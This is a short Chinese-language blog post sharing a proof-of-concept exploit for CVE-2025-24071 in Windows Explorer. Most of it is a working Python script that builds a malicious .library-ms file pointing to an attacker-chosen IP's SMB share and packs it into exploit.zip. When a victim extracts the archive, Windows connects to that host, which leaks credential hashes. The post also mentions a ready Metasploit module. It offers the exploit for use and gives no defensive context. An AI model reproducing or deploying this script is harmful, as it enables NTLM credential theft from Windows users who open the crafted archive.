【通用】 CVE-2025-24071 Windows 资源管理器重大漏洞poc

【通用】 CVE-2025-24071 Windows 资源管理器重大漏洞poc

github链接:poc

py脚本

import os
import zipfile

def main():
    """
    该程序生成一个恶意 .library-ms 文件,并将其打包为 ZIP 归档。
    用户需要输入文件名称和攻击者的 IP 地址。
    """
    file_name = input("Enter your file name: ")
    ip_address = input("Enter IP (EX: 192.168.1.162): ")

    # 构造 library-ms 文件内容
    library_content = f"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>\\\\{ip_address}\\shared</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""

    library_file_name = f"{file_name}.library-ms"
    
    # 写入 library-ms 文件
    with open(library_file_name, "w", encoding="utf-8") as f:
        f.write(library_content)

    # 创建 ZIP 文件并添加 library-ms 文件
    with zipfile.ZipFile("exploit.zip", mode="w", compression=zipfile.ZIP_DEFLATED) as zipf:
        zipf.write(library_file_name)

    # 删除原始的 library-ms 文件
    if os.path.exists(library_file_name):
        os.remove(library_file_name)

    print("Completed: exploit.zip has been created.")

if __name__ == "__main__":
    main()

metaspolit中已有利用模块

© 版权声明
THE END
喜欢就支持一下吧
点赞15 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容